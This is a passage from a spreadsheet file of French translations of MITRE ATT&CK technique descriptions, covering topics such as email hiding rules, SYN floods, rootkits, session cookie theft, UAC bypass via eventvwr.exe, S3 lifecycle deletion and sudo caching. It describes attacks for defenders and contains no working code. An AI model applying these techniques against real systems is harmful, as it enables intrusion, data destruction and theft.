Tout utilisateur ou administrateur au sein de l’organisation (ou tout adversaire disposant d’informations d’identification valides) peut être en mesure de créer des règles pour déplacer ou supprimer automatiquement les e-mails. Ces règles peuvent être utilisées de manière abusive pour altérer ou retarder la détection si le contenu de l’e-mail avait été immédiatement vu par un utilisateur ou un défenseur. Les règles malveillantes filtrent généralement les e-mails en fonction de mots clés (tels que &lt;code&gt;logiciel malveillant&lt;/code&gt;, &lt;code&gt;suspect,&lt;/code&gt; &lt;code&gt;hameçonnage&lt;/code&gt; et &lt;code&gt;piratage&lt;/code&gt;) trouvés dans le corps des messages et les lignes d’objet. (Citation : Sécurité des applications cloud Microsoft)
Dans certains environnements, les administrateurs peuvent être en mesure d’activer des règles de messagerie qui s’appliquent à l’ensemble de l’organisation plutôt qu’aux boîtes de réception individuelles. Par exemple, Microsoft Exchange prend en charge les règles de transport qui évaluent tous les messages qu’une organisation reçoit par rapport aux conditions spécifiées par l’utilisateur, puis effectuent une action spécifiée par l’utilisateur sur les messages qui respectent ces conditions. (Citation : Règles de flux de messagerie Microsoft 2023) Les adversaires qui abusent de ces fonctionnalités peuvent être en mesure de modifier ou de supprimer automatiquement tous les e-mails liés à des sujets spécifiques (tels que les notifications d’incidents de sécurité internes).
https://attack.mitre.org/techniques/T1564/008</t>
  </si>
  <si>
    <t>Un adversaire peut dégrader des systèmes externes à une organisation dans le but de diffuser des messages, d’intimider ou d’induire en erreur une organisation ou des utilisateurs. [Défiguration externe](https://attack.mitre.org/techniques/T1491/002) peut finalement amener les utilisateurs à se méfier des systèmes et à remettre en question/discréditer l’intégrité du système. Les sites Web externes sont souvent victimes de la défiguration ; Souvent pris pour cible par des groupes d’adversaires et d’hacktivistes afin de faire passer un message politique ou de diffuser de la propagande. (Citation : Cybermenaces de FireEye pour les industries des médias)(Citation : Déclaration de Kevin Mandia devant la Commission du renseignement du Sénat américain)(Citation : Des pirates anonymes défigurent le site du gouvernement russe) [Défiguration externe](https://attack.mitre.org/techniques/T1491/002) peuvent être utilisés comme catalyseur pour déclencher des événements ou en réponse à des mesures prises par une organisation ou un gouvernement. De même, la défiguration d’un site Web peut également être utilisée comme configuration ou précurseur d’attaques futures telles que [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). (Citation : Trend Micro Deep Dive into Defigurement)
https://attack.mitre.org/techniques/T1491/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent chiffrer ou encoder des fichiers pour masquer des chaînes, des octets et d’autres motifs spécifiques afin d’entraver la détection. Le chiffrement et/ou l’encodage du contenu d’un fichier visent à dissimuler des artefacts malveillants dans un fichier utilisé dans une intrusion. De nombreuses autres techniques, telles que le [Software Packing](https://attack.mitre.org/techniques/T1027/002), la [Steganographie](https://attack.mitre.org/techniques/T1027/003) et les [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), partagent le même objectif général. Le chiffrement et/ou l’encodage des fichiers peuvent entraîner une défaillance de la détection des signatures statiques, mais ce contenu malveillant n’est révélé (c’est-à-dire [Débrouiller/Décoder des fichiers ou des informations](https://attack.mitre.org/techniques/T1140)) au moment de l’exécution/de l’utilisation.
Ce type d’obfuscation de fichiers peut être appliqué à de nombreux artefacts de fichiers présents sur les hôtes victimes, tels que les fichiers de journal/configuration de logiciels malveillants et les fichiers de charge utile. (Citation : Obscurcissement de fichier) Les fichiers peuvent être chiffrés à l’aide d’une clé codée en dur ou fournie par l’utilisateur, ainsi que masqués à l’aide de schémas d’encodage/compression standard tels que Base64.
L’intégralité du contenu d’un fichier peut être obscurcie, ou seulement des fonctions ou des valeurs spécifiques (telles que les adresses C2). Le chiffrement et l’encodage peuvent également être appliqués dans des couches redondantes pour une protection supplémentaire.
Par exemple, les adversaires peuvent abuser de documents Word protégés par mot de passe ou d’archives auto-extractibles (SFX) comme méthode de chiffrement/encodage d’un fichier tel qu’une charge utile [Phishing](https://attack.mitre.org/techniques/T1566). Ces fichiers fonctionnent généralement en attachant le contenu archivé prévu à un stub de décompresseur qui est exécuté lorsque le fichier est appelé (par exemple, [Exécution par l’utilisateur](https://attack.mitre.org/techniques/T1204)). (Citation : SFX - Fichier crypté/encodé) 
Les adversaires peuvent également abuser des schémas d’encodage spécifiques aux fichiers ainsi que des schémas de codage personnalisés. Par exemple, les en-têtes BOM (Byte Order Mark) dans les fichiers texte peuvent être utilisés de manière abusive pour manipuler et obscurcir le contenu du fichier jusqu’à l’exécution de [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).
https://attack.mitre.org/techniques/T1027/013</t>
  </si>
  <si>
    <t>Les adversaires peuvent collecter les adresses IP de la victime qui peuvent être utilisées lors du ciblage. Les adresses IP publiques peuvent être attribuées aux organisations par bloc ou par une plage d’adresses séquentielles. Les informations sur les adresses IP attribuées peuvent inclure divers détails, tels que les adresses IP utilisées. Les adresses IP peuvent également permettre à un adversaire d’obtenir d’autres détails sur une victime, tels que la taille de l’organisation, l’emplacement physique, le fournisseur d’accès à Internet et/ou l’endroit et la manière dont son infrastructure publique est hébergée.
Les adversaires peuvent collecter ces informations de différentes manières, par exemple par le biais d’une [analyse active](https://attack.mitre.org/techniques/T1595) ou d’un [hameçonnage pour obtenir des informations](https://attack.mitre.org/techniques/T1598). Les informations relatives aux adresses IP attribuées peuvent également être exposées à des adversaires via des ensembles de données en ligne ou d’autres ensembles de données accessibles (ex : [Rechercher dans des bases de données techniques ouvertes](https://attack.mitre.org/techniques/T1596)). (Citation : WHOIS)(Citation : benne à ordures DNS)(Citation : Circl DNS passif)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[Externe distant Services](https://attack.mitre.org/techniques/T1133)).
https://attack.mitre.org/techniques/T1590/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent lancer une attaque par déni de service (DoS) ciblant le système d’exploitation (OS) d’un terminal. Le système d’exploitation d’un système est chargé de gérer les ressources limitées et d’éviter que l’ensemble du système ne soit submergé par des demandes excessives sur sa capacité. Ces attaques n’ont pas besoin d’épuiser les ressources réelles d’un système ; les attaques peuvent simplement épuiser les limites et les ressources disponibles qu’un système d’exploitation s’impose lui-même.
Il existe différentes façons d’y parvenir, notamment les attaques d’épuisement d’état TCP telles que les inondations SYN et les inondations ACK. (Citation : Arbor AnnualDoSreport janvier 2018) Avec les inondations SYN, des quantités excessives de paquets SYN sont envoyées, mais l’établissement de liaison TCP à 3 voies n’est jamais terminé. Étant donné que chaque système d’exploitation dispose d’un nombre maximal de connexions TCP simultanées qu’il autorise, cela peut rapidement épuiser la capacité du système à recevoir de nouvelles demandes de connexions TCP, empêchant ainsi l’accès à tout service TCP fourni par le serveur. (Citation : Cloudflare SynFlood)
Les inondations ACK exploitent la nature étatique du protocole TCP. Un flot de paquets ACK est envoyé à la cible. Cela oblige le système d’exploitation à rechercher dans sa table d’état une connexion TCP associée qui a déjà été établie. Étant donné que les paquets ACK concernent des connexions qui n’existent pas, le système d’exploitation devra effectuer une recherche dans l’intégralité de la table d’état pour confirmer qu’aucune correspondance n’existe. Lorsqu’il est nécessaire de le faire pour un grand nombre de paquets, les exigences de calcul peuvent entraîner la lenteur et/ou l’inactivité du serveur, en raison du travail qu’il doit effectuer pour éliminer les paquets ACK non autorisés. Cela réduit considérablement les ressources disponibles pour fournir le service ciblé. (Référence : Corero SYN-ACKflood)
https://attack.mitre.org/techniques/T1499/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des rootkits pour masquer la présence de programmes, de fichiers, de connexions réseau, de services, de pilotes et d’autres composants du système. Les rootkits sont des programmes qui cachent l’existence de logiciels malveillants en interceptant/connectant et en modifiant les appels API du système d’exploitation qui fournissent des informations système. (Citation : Rootkits Windows Symantec) 
Les rootkits ou les fonctionnalités d’activation des rootkits peuvent résider au niveau de l’utilisateur ou du noyau dans le système d’exploitation ou à un niveau inférieur, pour inclure un hyperviseur, un enregistrement de démarrage principal ou un [microprogramme système](https://attack.mitre.org/techniques/T1542/001). (citation : Wikipedia rootkit) Les rootkits ont été vus pour les systèmes Windows, Linux et Mac OS X. (Citation : CrowdStrike Linux Rootkit) (Citation : BlackHat Mac OSX Rootkit)
https://attack.mitre.org/techniques/T1014</t>
  </si>
  <si>
    <t>Les adversaires peuvent obtenir de la persistance et des privilèges élevés en exécutant du contenu malveillant déclenché par des profils PowerShell. Un profil PowerShell (&lt;code&gt;profile.ps1&lt;/code&gt;) est un script qui s’exécute au démarrage de [PowerShell](https://attack.mitre.org/techniques/T1059/001) et qui peut être utilisé comme script d’ouverture de session pour personnaliser les environnements utilisateur.
[PowerShell](https://attack.mitre.org/techniques/T1059/001) Prend en charge plusieurs profils en fonction de l’utilisateur ou du programme hôte. Par exemple, il peut exister différents profils pour les programmes hôtes [PowerShell](https://attack.mitre.org/techniques/T1059/001) tels que la console PowerShell, PowerShell ISE ou Visual Studio Code. Un administrateur peut également configurer un profil qui s’applique à tous les utilisateurs et programmes hôtes sur l’ordinateur local. (Citation : Microsoft à propos des profils) 
Les adversaires peuvent modifier ces profils pour inclure des commandes, des fonctions, des modules et/ou des lecteurs [PowerShell](https://attack.mitre.org/techniques/T1059/001) arbitraires afin d’obtenir une persistance. Chaque fois qu’un utilisateur ouvre une session [PowerShell](https://attack.mitre.org/techniques/T1059/001), le script modifié est exécuté, sauf si l’indicateur &lt;code&gt;-NoProfile&lt;/code&gt; est utilisé lors de son lancement. (Citation : ESET Turla PowerShell mai 2019) 
Un adversaire peut également être en mesure d’élever les privilèges si un script dans un profil PowerShell est chargé et exécuté par un compte disposant de privilèges plus élevés, tel qu’un administrateur de domaine. (Citation : Wits End et profils PowerShell louches)
https://attack.mitre.org/techniques/T1546/013</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de diverses implémentations de JavaScript pour l’exécution. JavaScript (JS) est un langage de script indépendant de la plate-forme (compilé juste-à-temps au moment de l’exécution) généralement associé aux scripts des pages Web, bien que JS puisse être exécuté dans des environnements d’exécution en dehors du navigateur. (Citation : NodeJS)
JScript est l’implémentation Microsoft de la même norme de script. JScript est interprété via le moteur de script Windows et donc intégré à de nombreux composants de Windows tels que les pages [Component Object Model](https://attack.mitre.org/techniques/T1559/001) et Internet Explorer HTML Application (HTA). (Citation : JScrip mai 2018)(Citation : Microsoft JScript 2007)(Citation : Scripts Microsoft Windows)
JavaScript for Automation (JXA) est un langage de script macOS basé sur JavaScript, inclus dans l’architecture Open Scripting Architecture (OSA) d’Apple, qui a été introduit dans OSX 10.10. L’OSA d’Apple fournit des capacités de script pour contrôler les applications, s’interfacer avec le système d’exploitation et faire le lien entre l’accès au reste des API internes d’Apple. À partir d’OSX 10.10, OSA ne prend en charge que deux langues, JXA et [AppleScript](https://attack.mitre.org/techniques/T1059/002). Les scripts peuvent être exécutés via l’utilitaire de ligne de commande &lt;code&gt;osascript&lt;/code&gt;, ils peuvent être compilés dans des applications ou des fichiers de script via &lt;code&gt;osacompile&lt;/code&gt;, et ils peuvent être compilés et exécutés en mémoire d’autres programmes en exploitant le framework OSAKit. (Citation : Apple À propos de Mac Scripting 2016)(Citation : SpecterOps JXA 2020)(Citation : SentinelOne macOS Red Team)(Citation : Moineau argenté Red Canary, février 2021)(Citation : MDSec macOS JXA et VSCode)
Les adversaires peuvent abuser de diverses implémentations de JavaScript pour exécuter divers comportements. Les utilisations courantes incluent l’hébergement de scripts malveillants sur des sites Web dans le cadre d’une [compromission intempestive](https://attack.mitre.org/techniques/T1189) ou le téléchargement et l’exécution de ces fichiers de script en tant que charges utiles secondaires. Étant donné que ces charges utiles sont basées sur du texte, il est également très courant que des adversaires obscurcissent leur contenu dans le cadre de [Fichiers ou informations obscurcis](https://attack.mitre.org/techniques/T1027).
https://attack.mitre.org/techniques/T1059/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur le DNS de la victime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enregistrements DNS MX, TXT et SPF peuvent également révéler l’utilisation de fournisseurs de cloud et de SaaS tiers, tels qu’Office 365, G Suite, Salesforce ou Zendesk. (Citation : Sean Metcalf Twitter DNS records)
Les adversaires peuvent collecter ces informations de différentes manières, par exemple en interrogeant ou en collectant des détails via [DNS/DNS passif](https://attack.mitre.org/techniques/T1596/001). Les informations DNS peuvent également être exposées à des adversaires via des ensembles de données en ligne ou d’autres ensembles de données accessibles (ex : [Rechercher dans des bases de données techniques ouvertes](https://attack.mitre.org/techniques/T1596)). (Citation : benne à ordures DNS)(Citation : Circl DNS passif) La collecte de ces informations peut révéler des possibilités pour d’autres formes de reconnaissance (ex : [Recherche dans des bases de données techniques ouvertes](https://attack.mitre.org/techniques/T1596), [Recherche dans des sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593) ou [Analyse active](https://attack.mitre.org/techniques/T1595)), l’établissement de ressources opérationnelles (ex : [Acquisition d’infrastructure](https://attack.mitre.org/techniques/T1583) ou [Compromission d’infrastructure]( https://attack.mitre.org/techniques/T1584)), et/ou l’accès initial (ex : [Services à distance externes](https://attack.mitre.org/techniques/T1133)).
Les adversaires peuvent également utiliser le transfert de zone DNS (requête DNS de type AXFR) pour collecter tous les enregistrements d’un serveur DNS mal configuré. (Citation : Trails-DNS)(Citation : DNS-CISA)(Citation : Alexa-dns)
https://attack.mitre.org/techniques/T1590/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier les politiques de cycle de vie d’un compartiment de stockage cloud pour détruire tous les objets qui y sont stockés.  
Les compartiments de stockage dans le cloud permettent souvent aux utilisateurs de définir des politiques de cycle de vie pour automatiser la migration, l’archivage ou la suppression d’objets après une période de temps définie. (Référence : Cycles de vie du stockage AWS)(Citation : Cycles de vie du stockage GCP)(Citation : Cycles de vie du stockage Azure) Si un auteur de menace dispose des autorisations suffisantes pour modifier ces politiques, il peut être en mesure de supprimer tous les objets en même temps. 
Par exemple, dans les environnements AWS, un adversaire disposant de l’autorisation « PutLifecycleConfiguration » peut utiliser l’appel d’API « PutBucketLifecycle » pour appliquer une politique de cycle de vie à un compartiment S3 qui supprime tous les objets du compartiment au bout d’un jour. (Citation : Ransomware de Palo Alto Cloud) Outre la destruction de données à des fins d’extorsion et de [vol financier](https://attack.mitre.org/techniques/T1657), les adversaires peuvent également effectuer cette action sur des compartiments stockant des journaux cloud pour [Suppression de l’indicateur](https://attack.mitre.org/techniques/T1070). (Référence : Datadog S3 Lifecycle CloudTrail Logs)
https://attack.mitre.org/techniques/T1485/001</t>
  </si>
  <si>
    <t>Un adversaire peut exploiter les périphériques d’un ordinateur (par exemple, les microphones et les webcams) ou les applications (par exemple, les services d’appels vocaux et vidéo) pour capturer des enregistrements audio dans le but d’écouter des conversations sensibles afin de recueillir des informations. (Citation : ESET Attor octobre 2019)
Des logiciels malveillants ou des scripts peuvent être utilisés pour interagir avec les appareils via une API disponible fournie par le système d’exploitation ou une application de capture audio. Les fichiers audio peuvent être écrits sur le disque et exfiltrés ultérieurement.
https://attack.mitre.org/techniques/T1123</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer ou modifier des processus au niveau du système pour exécuter de manière répétée des charges utiles malveillantes dans le cadre de la persistance. Lorsque les systèmes d’exploitation démarrent, ils peuvent démarrer des processus qui exécutent des fonctions système en arrière-plan. Sous Windows et Linux, ces processus système sont appelés services. (Citation : TechNet Services) Sous macOS, les processus launchd connus sous le nom de [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) et [Launch Agent](https://attack.mitre.org/techniques/T1543/001) sont exécutés pour terminer l’initialisation du système et charger les paramètres spécifiques à l’utilisateur. (Citation : démons de l’agent de lancement AppleDocs) 
Les adversaires peuvent installer de nouveaux services, démons ou agents qui peuvent être configurés pour s’exécuter au démarrage ou à un intervalle reproductible afin d’établir la persistance. De même, les adversaires peuvent modifier des services, des démons ou des agents existants pour obtenir le même effet.  
Les services, les démons ou les agents peuvent être créés avec des privilèges d’administrateur, mais exécutés avec des privilèges root/SYSTEM. Les adversaires peuvent exploiter cette fonctionnalité pour créer ou modifier des processus système afin d’élever les privilèges. (Citation : Détection des logiciels malveillants OSX)
https://attack.mitre.org/techniques/T1543</t>
  </si>
  <si>
    <t>Les adversaires peuvent tirer parti de services à distance externes pour accéder initialement à un réseau et/ou y persister. Les services à distance tels que les VPN, Citrix et d’autres mécanismes d’accès permettent aux utilisateurs de se connecter aux ressources du réseau interne de l’entreprise à partir d’emplacements externes. Il existe souvent des passerelles de service distantes qui gèrent les connexions et l’authentification des informations d’identification pour ces services. Des services tels que [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) et [VNC](https://attack.mitre.org/techniques/T1021/005) peuvent également être utilisés en externe. (Citation : Logiciel MacOS VNC pour le bureau à distance)
L’accès à [Comptes valides](https://attack.mitre.org/techniques/T1078) pour utiliser le service est souvent une exigence, qui peut être obtenue par le biais du pharming d’identifiants ou en obtenant les identifiants des utilisateurs après avoir compromis le réseau d’entreprise. (Citation : Volexity Virtual Private Keylogging) L’accès aux services distants peut être utilisé comme mécanisme d’accès redondant ou persistant au cours d’une opération.
L’accès peut également être obtenu par le biais d’un service exposé qui ne nécessite pas d’authentification. Dans les environnements conteneurisés, il peut s’agir d’une API Docker exposée, d’un serveur d’API Kubernetes, d’un kubelet ou d’une application web telle que le tableau de bord Kubernetes. (Citation : Trend Micro Exposed Docker Server)(Citation : Unité 42 Hildegard Malware)
https://attack.mitre.org/techniques/T1133</t>
  </si>
  <si>
    <t>Les adversaires peuvent établir la persistance en exécutant du contenu malveillant déclenché par l’exécution de fichiers binaires corrompus. Les binaires Mach-O ont une série d’en-têtes qui sont utilisés pour effectuer certaines opérations lorsqu’un binaire est chargé. L’en-tête LC_LOAD_DYLIB d’un binaire Mach-O indique à macOS et OS X les bibliothèques dynamiques (dylibs) à charger pendant l’exécution. Ceux-ci peuvent être ajoutés ad hoc au binaire compilé tant que des ajustements sont apportés au reste des champs et dépendances. (Citation : Écrire un mauvais logiciel malveillant pour OSX) Des outils sont disponibles pour effectuer ces modifications.
Les adversaires peuvent modifier les en-têtes binaires Mach-O pour charger et exécuter des dylibs malveillants à chaque fois que le binaire est exécuté. Bien que toute modification invalide les signatures numériques sur les fichiers binaires car le fichier binaire est en cours de modification, cela peut être corrigé en supprimant simplement la commande LC_CODE_SIGNATURE du fichier binaire afin que la signature ne soit pas vérifiée au moment du chargement. (Citation : Persistance des logiciels malveillants sur OS X)
https://attack.mitre.org/techniques/T1546/006</t>
  </si>
  <si>
    <t>Un adversaire peut voler des cookies de session d’applications Web ou de services et les utiliser pour accéder à des applications Web ou à des services Internet en tant qu’utilisateur authentifié sans avoir besoin d’informations d’identification. Les applications et services Web utilisent souvent des cookies de session comme jeton d’authentification une fois qu’un utilisateur s’est authentifié sur un site Web.
Les cookies sont souvent valables pour une période prolongée, même si l’application web n’est pas utilisée activement. Les cookies se trouvent sur le disque, dans la mémoire du navigateur et dans le trafic réseau vers des systèmes distants. En outre, d’autres applications sur la machine cible peuvent stocker des cookies d’authentification sensibles en mémoire (par exemple, des applications qui s’authentifient auprès des services cloud). Les cookies de session peuvent être utilisés pour contourner certains protocoles d’authentification multifactorielle. (Citation : Passez le cookie)
Il existe plusieurs exemples de logiciels malveillants ciblant les cookies des navigateurs Web sur le système local. (Référence : Kaspersky TajMahal, avril 2019)(Citation : Unit 42 Mac Crypto Cookies Janvier 2019) Les adversaires peuvent également voler des cookies en injectant du contenu JavaScript malveillant dans des sites Web ou en s’appuyant sur [User Execution](https://attack.mitre.org/techniques/T1204) en incitant les victimes à exécuter du JavaScript malveillant dans leur navigateur. (Citation : Talos Roblox Scam 2023)(Citation : Favoris Discord de Krebs 2023)
Il existe également des frameworks open source tels que « Evilginx2 » et « Muraena » qui peuvent collecter des cookies de session via un proxy malveillant (par exemple, [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) qui peuvent être configurés par un adversaire et utilisés dans des campagnes de phishing. (Citation : Github evilginx2)(Citation : GitHub Mauraena)
Une fois qu’un adversaire a acquis un cookie valide, il peut ensuite exécuter une technique [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) pour se connecter à l’application Web correspondante.
https://attack.mitre.org/techniques/T1539</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de la fonctionnalité de planification des tâches fournie par les outils d’orchestration de conteneurs tels que Kubernetes pour planifier le déploiement de conteneurs configurés pour exécuter du code malveillant. Les tâches d’orchestration de conteneurs exécutent ces tâches automatisées à une date et une heure spécifiques, comme les tâches cron sur un système Linux. Les déploiements de ce type peuvent également être configurés pour maintenir une quantité de conteneurs au fil du temps, ce qui automatise le processus de maintien de la persistance au sein d’un cluster.
Dans Kubernetes, un CronJob peut être utilisé pour planifier un Job qui exécute un ou plusieurs conteneurs afin d’effectuer des tâches spécifiques. (Citation : Emplois Kubernetes)(Citation : Kubernetes CronJob) Par conséquent, un adversaire peut utiliser un CronJob pour planifier le déploiement d’un Job qui exécute du code malveillant dans divers nœuds d’un cluster. (Citation : Matrice des menaces pour Kubernetes)
https://attack.mitre.org/techniques/T1053/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des algorithmes de génération de domaine (DGA) pour identifier dynamiquement un domaine de destination pour le trafic de commande et de contrôle plutôt que de s’appuyer sur une liste d’adresses IP statiques ou de domaines. Cela a l’avantage de rendre beaucoup plus difficile pour les défenseurs de bloquer, de suivre ou de prendre le contrôle du canal de commande et de contrôle, car il peut y avoir des milliers de domaines que les logiciels malveillants peuvent vérifier pour obtenir des instructions. (Citation : Cybereason dissèquant les DGA)(Citation : Cisco Umbrella DGA)(Citation : Unité 42 DGA février 2019)
Les DGA peuvent prendre la forme de chaînes apparemment aléatoires ou de « charabia » (ex : istgmxdejdnxuyla.ru) lorsqu’elles construisent des noms de domaine en générant chaque lettre. Alternativement, certains DGA utilisent des mots entiers comme unité en concaténant des mots ensemble au lieu de lettres (ex : cityjulydish.net). De nombreux DGA sont basés sur le temps, générant un domaine différent pour chaque période (horaire, quotidienne, mensuelle, etc.). D’autres intègrent également une valeur de départ pour rendre la prédiction des domaines futurs plus difficile pour les défenseurs. (Citation : Cybereason dissèquant les DGA)(Citation : Cisco Umbrella DGA)(Citation : Talos CCleanup 2017)(Référence : Akamai DGA Mitigation)
Les adversaires peuvent utiliser les DGA à des fins de [canaux de secours](https://attack.mitre.org/techniques/T1008). Lorsque le contact est perdu avec le serveur de commande et de contrôle principal, les logiciels malveillants peuvent utiliser un DGA comme moyen de rétablir la commande et le contrôle. (Citation : Talos CCleanup 2017)(Citation : FireEye POSHSPY avril 2017)(Citation : Activité ESET Sednit 2017)
https://attack.mitre.org/techniques/T1568/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser d’une double extension dans le nom de fichier afin de masquer le véritable type de fichier. Un nom de fichier peut inclure une extension de type de fichier secondaire qui peut entraîner l’affichage uniquement de la première extension (ex : &lt;code&gt;File.txt.exe&lt;/code&gt; peut s’afficher dans certaines vues comme &lt;code&gt;File.txt&lt;/code&gt;). Cependant, la deuxième extension est le type de fichier réel qui détermine la façon dont le fichier est ouvert et exécuté. L’extension de fichier réelle peut être cachée par le système d’exploitation dans le navigateur de fichiers (ex : explorer.exe), ainsi que dans tout logiciel configuré à l’aide ou similaire aux politiques du système. (Citation : PCMag DoubleExtension)(Citation : SOCPrime DoubleExtension) 
Les adversaires peuvent abuser des doubles extensions pour tenter de dissimuler des types de fichiers dangereux de charges utiles. Une utilisation très courante consiste à inciter un utilisateur à ouvrir ce qu’il pense être un type de fichier inoffensif mais qui est en fait du code exécutable. Ces fichiers se font souvent passer pour des pièces jointes à un e-mail et permettent à un adversaire d’obtenir [Accès initial](https://attack.mitre.org/tactics/TA0001) dans le système d’un utilisateur via [Pièce jointe pour hameçonnage criminel](https://attack.mitre.org/techniques/T1566/001) puis [Exécution par l’utilisateur](https://attack.mitre.org/techniques/T1204). Par exemple, une pièce jointe de fichier exécutable nommée &lt;code&gt;Evil.txt.exe&lt;/code&gt; peut &lt;code&gt;s’afficher comme Evil.txt&lt;/code&gt; pour un utilisateur. L’utilisateur peut alors le visualiser comme un fichier texte inoffensif et l’ouvrir, exécutant par inadvertance le logiciel malveillant caché. (Citation : SOCPrime DoubleExtension)
Les types de fichiers courants, tels que les fichiers texte (.txt, .doc, etc.) et les fichiers image (.jpg, .gif, etc.) sont généralement utilisés comme première extension à apparaître inoffensive. Les extensions exécutables généralement considérées comme dangereuses, telles que .exe, .lnk, .hta et .scr, apparaissent souvent comme la deuxième extension et le véritable type de fichier.
https://attack.mitre.org/techniques/T1036/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent contourner les mécanismes UAC pour élever les privilèges de processus sur le système. Le contrôle de compte d’utilisateur (UAC) Windows permet à un programme d’élever ses privilèges (suivis par des niveaux d’intégrité allant de faible à élevé) pour effectuer une tâche sous des autorisations de niveau administrateur, éventuellement en demandant à l’utilisateur de confirmer. L’impact pour l’utilisateur va du refus de l’opération dans le cadre d’une application stricte à l’autorisation de l’utilisateur d’effectuer l’action s’il fait partie du groupe d’administrateurs locaux et clique sur l’invite, ou à la possibilité de saisir un mot de passe administrateur pour terminer l’action.
Si le niveau de protection UAC d’un ordinateur n’est pas le niveau le plus élevé, certains programmes Windows peuvent élever les privilèges ou exécuter des objets élevés [Component Object Model](https://attack.mitre.org/techniques/T1559/001) sans demander à l’utilisateur via la boîte de notification UAC. (Citation : TechNet à l’intérieur de l’UAC)(Citation : MSDN COM Elevation) Par exemple, l’utilisation de [Rundll32](https://attack.mitre.org/techniques/T1218/011) pour charger une DLL spécialement conçue qui charge un objet [Component Object Model](https://attack.mitre.org/techniques/T1559/001) à élévation automatique et effectue une opération de fichier dans un répertoire protégé qui nécessiterait généralement un accès élevé. Un logiciel malveillant peut également être injecté dans un processus approuvé pour obtenir des privilèges élevés sans inviter l’utilisateur. (Citation : Davidson Windows)
De nombreuses méthodes ont été découvertes pour contourner l’UAC. La page Readme Github pour UACME contient une liste exhaustive de méthodes (Citation : Github UACMe) qui ont été découvertes et mises en œuvre, mais il se peut qu’il ne s’agisse pas d’une liste exhaustive de contournements. D’autres méthodes de contournement sont régulièrement découvertes et certaines utilisées dans la nature, telles que :
* &lt;code&gt;eventvwr.exe&lt;/code&gt; pouvez élever automatiquement et exécuter un binaire ou un script spécifié. (Citation : enigma0x3 Fileless UAC Bypass)(Citation : Fortinet Fareit)
Un autre contournement est possible grâce à certaines techniques de mouvement latéral si les informations d’identification d’un compte avec des privilèges d’administrateur sont connues, car l’UAC est un mécanisme de sécurité de système unique et le privilège ou l’intégrité d’un processus exécuté sur un système sera inconnu sur les systèmes distants et sera par défaut à haute intégrité. (Citation : Contournement SANS UAC)
https://attack.mitre.org/techniques/T1548/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent exploiter les services de messagerie pour pomper des SMS, ce qui peut avoir un impact sur la disponibilité du système et/ou du service hébergé. (Citation : Twilio SMS Pumping) Le pompage de SMS est un type de fraude dans le domaine des télécommunications par lequel un auteur de menace obtient d’abord un ensemble de numéros de téléphone d’un fournisseur de services de télécommunications, puis exploite l’infrastructure de messagerie d’une victime pour envoyer de grandes quantités de messages SMS à des numéros de cet ensemble. En générant du trafic SMS vers son numéro de téléphone défini, un auteur de menace peut gagner des paiements de la part du fournisseur de télécommunications. (Citation : Fraude au pompage de SMS Twilio)
Les auteurs de menace utilisent souvent des formulaires Web accessibles au public, tels que des mots de passe à usage unique (OTP) ou des champs de vérification de compte, afin de générer du trafic SMS. Ces champs peuvent exploiter des services tels que Twilio, AWS SNS et Amazon Cognito en arrière-plan. (Citation : Twilio SMS Pumping)(Référence : AWS RE :Inforce Threat Detection 2024) En réponse à la grande quantité de demandes, les coûts des SMS peuvent augmenter et les canaux de communication peuvent être débordés. (Citation : Twilio SMS Pumping)
https://attack.mitre.org/techniques/T1496/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent vérifier la connectivité Internet sur les systèmes compromis. Cela peut être effectué lors de la découverte automatisée et peut être accompli de nombreuses façons, telles que l’utilisation de [Ping](https://attack.mitre.org/software/S0097), &lt;code&gt;tracert&lt;/code&gt; et de requêtes GET vers des sites Web.
Les adversaires peuvent utiliser les résultats et les réponses de ces demandes pour déterminer si le système est capable de communiquer avec leurs serveurs C2 avant de tenter de s’y connecter. Les résultats peuvent également être utilisés pour identifier les routes, les redirecteurs et les serveurs proxy.
https://attack.mitre.org/techniques/T1016/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent effectuer une mise en cache sudo et/ou utiliser le fichier sudoers pour élever les privilèges. Les adversaires peuvent le faire pour exécuter des commandes en tant qu’autres utilisateurs ou générer des processus avec des privilèges plus élevés.
Dans les systèmes Linux et MacOS, sudo (parfois appelé « superuser do ») permet aux utilisateurs d’exécuter des commandes à partir de terminaux disposant de privilèges élevés et de contrôler qui peut exécuter ces commandes sur le système. La commande &lt;code&gt;sudo&lt;/code&gt; « permet à un administrateur système de déléguer l’autorité pour donner à certains utilisateurs (ou groupes d’utilisateurs) la possibilité d’exécuter certaines (ou toutes) commandes en tant qu’utilisateur root ou un autre utilisateur tout en fournissant une piste d’audit des commandes et de leurs arguments. » (Citation : sudo man page 2018) Étant donné que sudo a été conçu pour l’administrateur système, il dispose de certaines fonctionnalités de configuration utiles telles qu’un &lt;code&gt;timestamp_timeout&lt;/code&gt;, qui est le temps en minutes entre les instances de &lt;code&gt;sudo&lt;/code&gt; avant qu’il ne vous demande à nouveau un mot de passe. En effet, &lt;code&gt;sudo&lt;/code&gt; a la capacité de mettre en cache les informations d’identification pendant un certain temps. Sudo crée (ou touche) un fichier dans &lt;code&gt;/var/db/sudo&lt;/code&gt; avec un horodatage de la dernière exécution de sudo pour déterminer ce délai d’expiration. De plus, il existe une variable &lt;code&gt;tty_tickets&lt;/code&gt; qui traite chaque nouvelle tty (session terminale) de manière isolée. Cela signifie, par exemple, que le délai d’expiration sudo d’un tty n’affectera pas un autre tty (vous devrez taper à nouveau le mot de passe).
